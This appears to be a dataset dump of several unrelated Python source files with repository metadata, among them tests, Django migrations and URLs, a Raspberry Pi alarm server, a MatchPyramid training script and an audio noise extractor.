d7ce90cfa3c11363ca9e9fcb1fcea9371aa1b74d
|
[
"MIT"
] | 13 |
2020-07-23T12:15:24.000Z
|
2022-03-18T13:58:31.000Z
|
test/test_flow.py
|
williford/vipy
|
d7ce90cfa3c11363ca9e9fcb1fcea9371aa1b74d
|
[
"MIT"
] | 2 |
2020-02-26T00:58:40.000Z
|
2021-04-26T12:34:41.000Z
|
test/test_flow.py
|
williford/vipy
|
d7ce90cfa3c11363ca9e9fcb1fcea9371aa1b74d
|
[
"MIT"
] | 2 |
2020-05-11T15:31:06.000Z
|
2021-09-16T14:01:33.000Z
|
import vipy
from vipy.flow import Flow
import numpy as np
def test_flow():
imfrom = vipy.image.RandomScene(num_objects=1)
imto = imfrom.clone().zeropad(5, 10).cornercrop(imfrom.height(), imfrom.width())
imf = Flow().imageflow(imfrom, imto)
assert np.abs(np.median(imf.dx()) - 5) < 1 and np.abs(np.median(imf.dy()) - 10) < 1
print('[test_flow.imageflow]: PASSED')
if __name__ == "__main__":
test_flow()
| 25.588235 | 87 | 0.65977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.094253 |
7b204556097cfdfd3ff88e8d7bc8bf1337b3e12c
| 660 |
py
|
Python
|
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | 5 |
2021-12-08T06:37:33.000Z
|
2021-12-20T17:17:18.000Z
|
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | null | null | null |
server/main.py
|
DarthBenro008/gh-release-paniker
|
757845b1eebef9d2219c88706fd4277f4261391f
|
[
"MIT"
] | null | null | null |
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
LED=21
BUZZER=23
GPIO.setup(LED,GPIO.OUT)
def panikMode():
print("Entering PanikMode")
GPIO.output(LED,GPIO.HIGH)
GPIO.output(BUZZER,GPIO.HIGH)
def stopPanikMode():
print("Exiting PanikMode")
GPIO.output(LED,GPIO.LOW)
GPIO.output(BUZZER,GPIO.LOW)
@app.get("/")
def read_root():
return {"ping": "pong"}
@app.get("/stop")
def stopPanik():
stopPanik()
return {"paniking": "false"}
@app.get("/panik")
def panik():
panikMode()
return {"paniking": True}
| 16.5 | 33 | 0.672727 | 0 | 0 | 0 | 0 | 218 | 0.330303 | 0 | 0 | 96 | 0.145455 |
7b20674499d7148c6a6ca240f5128fad607757fd
| 8,656 |
py
|
Python
|
virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
|
alex-mu/Moringa-blog
|
430ab9c1f43f2f0066369433ac3f60c41a51a01c
|
[
"MIT"
] | null | null | null |
virtual/lib/python3.10/site-packages/bootstrap_py/tests/test_package.py
|
alex-mu/Moringa-blog
|
430ab9c1f43f2f0066369433ac3f60c41a51a01c
|
[
"MIT"
] | 7 |
2021-03-30T14:10:56.000Z
|
2022-03-12T00:43:13.000Z
|
virtual/lib/python3.6/site-packages/bootstrap_py/tests/test_package.py
|
sarahsindet/pitch
|
c7a4256e19c9a250b6d88d085699a34f508eb86b
|
[
"Unlicense",
"MIT"
] | 1 |
2021-08-19T06:07:23.000Z
|
2021-08-19T06:07:23.000Z
|
# -*- coding: utf-8 -*-
"""bootstrap_py.tests.test_package."""
import unittest
import os
import shutil
import tempfile
from glob import glob
from datetime import datetime
from mock import patch
from bootstrap_py import package
from bootstrap_py.tests.stub import stub_request_metadata
# pylint: disable=too-few-public-methods
class Dummy:
"""Dummy class."""
class PackageDataTests(unittest.TestCase):
"""bootstrap_py.package.PackageData tests."""
def setUp(self):
"""Prepare test data."""
self.params = Dummy()
setattr(self.params, 'foo', 'hoge')
setattr(self.params, 'bar', 'moge')
setattr(self.params, 'baz', 'fuga')
self.default_params = Dummy()
setattr(self.default_params, 'date', '2016-01-29')
setattr(self.default_params, 'version', '1.0.0')
setattr(self.default_params, 'description', 'dummy description.')
self.metadata = stub_request_metadata()
def test_provides_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.params)
# pylint: disable=no-member
self.assertEqual(pkg_data.foo, 'hoge')
self.assertEqual(pkg_data.bar, 'moge')
self.assertEqual(pkg_data.baz, 'fuga')
self.assertEqual(pkg_data.date, datetime.utcnow().strftime('%Y-%m-%d'))
self.assertEqual(pkg_data.version, '0.1.0')
# pylint: disable=fixme
self.assertEqual(pkg_data.description, '##### ToDo: Rewrite me #####')
def test_provides_default_params(self):
"""provides params without default params."""
pkg_data = package.PackageData(self.default_params)
# pylint: disable=no-member
self.assertEqual(pkg_data.date, '2016-01-29')
self.assertEqual(pkg_data.version, '1.0.0')
self.assertEqual(pkg_data.description, 'dummy description.')
def test_convert_to_dict(self):
"""convert PackageData to dict."""
dict_data = package.PackageData(self.default_params).to_dict()
# pylint: disable=no-member
self.assertEqual(dict_data.get('date'), '2016-01-29')
self.assertEqual(dict_data.get('version'), '1.0.0')
self.assertEqual(dict_data.get('description'), 'dummy description.')
class PackageTreeTests(unittest.TestCase):
"""bootstrap.package.PackageTree tests."""
def setUp(self):
"""Prepare test data."""
self.cwd = os.getcwd()
self.testdir = tempfile.mkdtemp(suffix='-bootstrap-py-test')
params = Dummy()
setattr(params, 'name', 'foo')
setattr(params, 'author', 'Alice')
setattr(params, 'email', '[email protected]')
setattr(params, 'url', 'https://example.org/foo')
setattr(params, 'license', 'gplv3')
setattr(params, 'outdir', self.testdir)
setattr(params, 'with_samples', True)
stub_request_metadata()
self.pkg_data = package.PackageData(params)
self.pkg_tree = package.PackageTree(self.pkg_data)
def tearDown(self):
os.chdir(self.cwd)
shutil.rmtree(self.testdir)
if os.path.isdir(self.pkg_tree.tmpdir):
self.pkg_tree.clean()
def test_initialize(self):
"""initialize PackageTree."""
self.assertEqual(self.pkg_tree.name, 'foo')
self.assertEqual(self.pkg_tree.outdir, self.testdir)
self.assertTrue(os.path.isdir(self.pkg_tree.tmpdir))
self.assertEqual(len(self.pkg_tree.templates.list_templates()), 18)
self.assertEqual(self.pkg_tree.pkg_data, self.pkg_data)
def test_init_py(self):
"""convert __init__.py path."""
self.assertEqual(getattr(self.pkg_tree, '_init_py')('foo/bar'),
os.path.join(self.pkg_tree.tmpdir,
'foo/bar/__init__.py'))
def test_tmpl_path(self):
"""convert tmplate path."""
self.assertEqual(getattr(self.pkg_tree, '_tmpl_path')('foo.py.j2'),
os.path.join(self.pkg_tree.tmpdir,
'foo.py'))
def test_generate_dirs(self):
"""generate directories."""
getattr(self.pkg_tree, '_generate_dirs')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.pkg_data.module_name))
self.assertTrue(os.path.isdir(
os.path.join(self.pkg_tree.pkg_data.module_name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
def test_list_module_dirs(self):
"""list module directories."""
self.assertEqual(getattr(self.pkg_tree, '_list_module_dirs')(),
['{module_name}', '{module_name}/tests'])
def test_generate_init(self):
"""generate __init__.py."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_init')()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
def test_generate_files(self):
"""generate files."""
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_generate_files_samples(self):
"""generate files."""
self.pkg_data.with_samples = True
getattr(self.pkg_tree, '_generate_dirs')()
getattr(self.pkg_tree, '_generate_files')()
os.chdir(self.pkg_tree.tmpdir)
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('foo/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('foo/tests/*')
if os.path.isfile(i)]), 2)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_move(self):
"""move source directory to destination directory."""
self.pkg_tree.move()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
self.assertTrue(os.path.isdir(self.testdir))
@patch('subprocess.call')
def test_generate(self, _mock):
"""generate directories, and files."""
popen_mock = _mock.return_value
popen_mock.wait = None
popen_mock.call = None
self.pkg_tree.generate()
os.chdir(self.pkg_tree.tmpdir)
self.assertTrue(os.path.isdir(self.pkg_tree.name))
self.assertTrue(os.path.isdir(os.path.join(self.pkg_tree.name,
'tests')))
self.assertTrue(os.path.isdir('utils'))
self.assertTrue(os.path.isdir('docs/source/modules'))
self.assertTrue(os.path.isfile('foo/__init__.py'))
self.assertTrue(os.path.isfile('foo/tests/__init__.py'))
self.assertEqual(len([i for i in glob('./*')
if os.path.isfile(i)]), 6)
self.assertEqual(len([i for i in glob('./.*')
if os.path.isfile(i)]), 5)
self.assertEqual(len([i for i in glob('utils/*')
if os.path.isfile(i)]), 1)
self.assertEqual(len([i for i in glob('docs/source/*')
if os.path.isfile(i)]), 3)
self.assertEqual(len([i for i in glob('docs/source/modules/*')
if os.path.isfile(i)]), 1)
def test_clean(self):
"""clean up."""
self.pkg_tree.clean()
self.assertFalse(os.path.isdir(self.pkg_tree.tmpdir))
| 42.019417 | 79 | 0.586992 | 8,321 | 0.961299 | 0 | 0 | 1,291 | 0.149145 | 0 | 0 | 1,818 | 0.210028 |
7b2072a69cb5c6d86996ccfc0e3130c0fc1d1caa
| 383 |
py
|
Python
|
news_bl/main/migrations/0005_alter_article_urltoimage.py
|
noddy09/news_search
|
7bee6a3aeb6c8a5e9e01109635fbd53f5d808722
|
[
"MIT"
] | null | null | null |
news_bl/main/migrations/0005_alter_article_urltoimage.py
|
noddy09/news_search
|
7bee6a3aeb6c8a5e9e01109635fbd53f5d808722
|
[
"MIT"
] | null | null | null |
news_bl/main/migrations/0005_alter_article_urltoimage.py
|
noddy09/news_search
|
7bee6a3aeb6c8a5e9e01109635fbd53f5d808722
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-08-30 13:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20210830_0359'),
]
operations = [
migrations.AlterField(
model_name='article',
name='urlToImage',
field=models.URLField(null=True),
),
]
| 20.157895 | 47 | 0.5953 | 290 | 0.75718 | 0 | 0 | 0 | 0 | 0 | 0 | 99 | 0.258486 |
7b20cd11ee3f48070fe24a5a912f30b91ada5d46
| 1,175 |
py
|
Python
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 1 |
2015-07-30T18:33:14.000Z
|
2015-07-30T18:33:14.000Z
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 104 |
2015-01-20T18:44:36.000Z
|
2022-03-29T18:51:55.000Z
|
utils/migrate_cmds_idx_32bit.py
|
jzuhone/kadi
|
de4885327d256e156cfe42b2b1700775f5b4d6cf
|
[
"BSD-3-Clause"
] | 2 |
2018-08-23T02:36:08.000Z
|
2020-03-13T19:24:36.000Z
|
from pathlib import Path
import numpy as np
import tables
# Use snapshot from aug08 before the last update that broke things.
with tables.open_file('cmds_aug08.h5') as h5:
cmds = h5.root.data[:]
print(cmds.dtype)
# [('idx', '<u2'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
# ('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_dtype = [('idx', '<i4'), ('date', 'S21'), ('type', 'S12'), ('tlmsid', 'S10'),
('scs', 'u1'), ('step', '<u2'), ('timeline_id', '<u4'), ('vcdu', '<i4')]
new_cmds = cmds.astype(new_dtype)
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
cmds_h5 = Path('cmds.h5')
if cmds_h5.exists():
cmds_h5.unlink()
with tables.open_file('cmds.h5', mode='a') as h5:
h5.create_table(h5.root, 'data', new_cmds, "cmds", expectedrows=2e6)
# Make sure the new file is really the same except the dtype
with tables.open_file('cmds.h5') as h5:
new_cmds = h5.root.data[:]
for name in cmds.dtype.names:
assert np.all(cmds[name] == new_cmds[name])
if name != 'idx':
assert cmds[name].dtype == new_cmds[name].dtype
assert new_cmds['idx'].dtype.str == '<i4'
| 31.756757 | 85 | 0.613617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 439 | 0.373617 |
7b21a08900385c33387348bb5cf7b32f2eca5c0f
| 579 |
py
|
Python
|
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
1_estrutura_sequencial/18_velocidade_download.py
|
cecilmalone/lista_de_exercicios_pybr
|
6d7c4aeddf8d1b1d839ad05ef5b5813a8fe611b5
|
[
"MIT"
] | null | null | null |
"""
18. Faça um programa que peça o tamanho de um arquivo para download (em MB) e
a velocidade de um link de Internet (em Mbps), calcule e informe o tempo
aproximado de download do arquivo usando este link (em minutos).
"""
mb_arquivo = float(input('Informe o tamanho de um arquivo para download (em MB): '))
mbps_link = float(input('Informe a velocidade do link de Internet (em Mbps): '))
velocidade_segundos = mb_arquivo / mbps_link
velocidade_minutos = velocidade_segundos / 60
print('O tempo aproximado para download do arquivo é de %d minuto(s).' %velocidade_minutos)
| 38.6 | 91 | 0.753022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 403 | 0.69244 |
7b2304794deb520b2f5f87d0e37dcca35db22896
| 4,802 |
py
|
Python
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 5 |
2019-11-08T09:17:07.000Z
|
2022-01-25T19:37:06.000Z
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 18 |
2020-01-28T22:17:34.000Z
|
2022-03-11T23:57:22.000Z
|
src/rte_pac/train_pyramid.py
|
UKPLab/conll2019-snopes-experiments
|
102f4a05cfba781036bd3a7b06022246e53765ad
|
[
"Apache-2.0"
] | 1 |
2021-03-08T12:02:24.000Z
|
2021-03-08T12:02:24.000Z
|
import argparse
import pickle
import os
import json
from sklearn.metrics import confusion_matrix
from utils.data_reader import embed_data_sets_with_glove, embed_data_set_given_vocab, prediction_2_label
from utils.text_processing import vocab_map
from common.util.log_helper import LogHelper
from deep_models.MatchPyramid import MatchPyramid
def _instantiate_model(param):
return MatchPyramid(random_state=55, tensorboard_logdir="logdir/", dropout_rate=0.15, learning_rate=0.0001, batch_size=32,
num_sents=param['max_sent'], embedding=param['embeddings'], show_progress=1, h_max_length=param['max_sent_size'],
s_max_length=param['max_sent_size'], word_dict=param['vocab'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='\'train\' or \'test\'', required=True)
parser.add_argument('--train', help='/path/to/training/set')
parser.add_argument('--valid', help='/path/to/validation/set')
parser.add_argument('--test', help='/path/to/test/set')
parser.add_argument('--model', help='/path/to/model/file', required=True)
parser.add_argument(
'--save-data', help='/path/to/save/data', default="data/rte/train/")
parser.add_argument('--load-data', help='/path/to/load/data/file')
parser.add_argument('--db', help='/path/to/data/base', required=True)
parser.add_argument(
'--max-sent', type=int, help='Maximal number of sentences per claim', default=5)
parser.add_argument('--embed', help='/path/to/embedding')
parser.add_argument(
'--save-result', help='/path/to/save/result', default="data/rte/result/")
args = parser.parse_args()
LogHelper.setup()
logger = LogHelper.get_logger(args.mode)
if args.mode == 'train':
assert args.train is not None or args.load_data is not None, "--train training set or --load-data should be provided in train mode"
assert args.embed is not None, "--embed should be provided in train mode"
# training mode
if args.load_data:
# load pre-processed training data
with open(args.load_data, "rb") as file:
param = pickle.load(file)
else:
# process training JSONL file
paths = [args.train, args.valid]
dataset_list, vocab, embeddings, b_max_sent_num, b_max_sent_size = embed_data_sets_with_glove(
paths, args.db, args.embed, threshold_b_sent_num=args.max_sent)
vocab = vocab_map(vocab)
param = {
'dataset_list': dataset_list,
'vocab': vocab,
'embeddings': embeddings,
'max_sent_size': b_max_sent_size,
'max_sent': args.max_sent
}
# save processed training data
os.makedirs(args.save_data, exist_ok=True)
train_data_path = os.path.join(
args.save_data, "train.{}.s{}.p".format("matchpyramid", str(args.max_sent)))
with open(train_data_path, "wb") as file:
pickle.dump(param, file, protocol=pickle.HIGHEST_PROTOCOL)
pyramid = _instantiate_model(param)
pyramid.fit(param['dataset_list'][0]['data'], param['dataset_list'][0]['label'],
param['dataset_list'][1]['data'], param['dataset_list'][1]['label'])
pyramid.save(args.model)
else:
# testing mode
assert args.load_data is not None, "--load_data should be provided in test mode"
assert args.test is not None, "--test test set should be provided in test mode"
with open(args.load_data, "rb") as file:
param = pickle.load(file)
pyramid = _instantiate_model(param)
pyramid.restore_model(args.model)
data_set = embed_data_set_given_vocab(args.test, args.db, param['vocab'], threshold_b_sent_num=param['max_sent'],
threshold_b_sent_size=param['max_sent_size'], threshold_h_sent_size=param['max_sent_size'])
os.makedirs(args.save_result, exist_ok=True)
test_result_path = os.path.join(
args.save_result, "predicted.pyramid.s{}.jsonl".format(param['max_sent']))
with open(test_result_path, "w") as result_file:
predictions = pyramid.predict(data_set['data'])
for i, prediction in enumerate(predictions):
data = {'predicted': prediction_2_label(prediction)}
if 'label' in data_set:
data['label'] = prediction_2_label(data_set['label'][i])
result_file.write(json.dumps(data) + "\n")
if 'label' in data_set:
logger.info("Confusion Matrix:")
logger.info(confusion_matrix(data_set['label'], predictions))
| 52.195652 | 139 | 0.641399 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,162 | 0.241983 |
7b2354c08ba6d3f70427aa659e1ba9d3a3e03c13
| 854 |
py
|
Python
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87 |
2020-08-07T09:05:11.000Z
|
2022-01-24T00:48:22.000Z
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 87 |
2020-08-07T19:12:10.000Z
|
2022-02-08T14:46:34.000Z
|
annotation/helpers/helpers/extract_noise.py
|
jim-schwoebel/allie
|
d85db041b91c81dfb3fd1a4d719b5aaaf3b6697e
|
[
"Apache-2.0"
] | 25 |
2020-08-07T20:03:08.000Z
|
2022-03-16T07:33:25.000Z
|
import shutil, os, random
from pydub import AudioSegment
try:
os.mkdir('noise')
except:
shutil.rmtree('noise')
os.mkdir('noise')
def extract_noise(filename, length):
song = AudioSegment.from_mp3(filename)
first = song[100:100+length]
first.export(filename[0:-4]+'_noise.mp3')
shutil.move(os.getcwd()+'/'+filename[0:-4]+'_noise.mp3', os.getcwd()+'/noise/'+filename[0:-4]+'_noise.mp3')
listdir=os.listdir()
mp3files=list()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
mp3files.append(listdir[i])
random.shuffle(mp3files)
for i in range(len(mp3files)):
extract_noise(mp3files[i],300)
if i == 100:
break
os.chdir('noise')
listdir=os.listdir()
for i in range(len(listdir)):
if listdir[i][-4:]=='.mp3':
os.system('play %s'%(listdir[i]))
remove=input('should remove? type y to remove')
if remove=='y':
os.remove(listdir[i])
| 27.548387 | 108 | 0.688525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 133 | 0.155738 |
7b248b5ee36bb65d830c7b56e66b0b390aa45baa
| 1,030 |
py
|
Python
|
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | 1 |
2021-11-04T09:03:27.000Z
|
2021-11-04T09:03:27.000Z
|
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | null | null | null |
ARMODServers/Apps/Apiv2/urls.py
|
Phantomxm2021/ARMOD-Dashboard
|
383cf0a5e72dc5a2651f43e693f06773d5b88bbd
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import url
from Apps.Apiv2.views import GetARResourcesView, GetARExperienceDetailView
from Apps.Apiv2.views import GetTagListView,GetARExperienceRecommendList,GetARExperiencePublicListView,GetARExperiencesView
from Apps.Apiv2.views import GetARexperienceByTagsListView
app_name = 'Apps.Users'
urlpatterns = [
url(r'^getarresources$', GetARResourcesView.as_view(), name='getarresources'),
url(r'^getarexperience$', GetARExperienceDetailView.as_view(), name='getarexperience'),
url(r'^getarexperiencelist$', GetARExperiencesView.as_view(), name='getarexperience'),
url(r'^gettaglist$', GetTagListView.as_view(), name='getshowcasetags'),
url(r'^getrecommendslist$', GetARExperienceRecommendList.as_view(), name='getshowcaserecommends'),
url(r'^getarexperiencepubliclist$', GetARExperiencePublicListView.as_view(), name='getarexperiencepubliclist'),
url(r'^getarexperiencebytagslist$', GetARexperienceByTagsListView.as_view(), name='getarexperiencebytagslist'),
# api/v2/
]
| 60.588235 | 123 | 0.794175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 325 | 0.315534 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.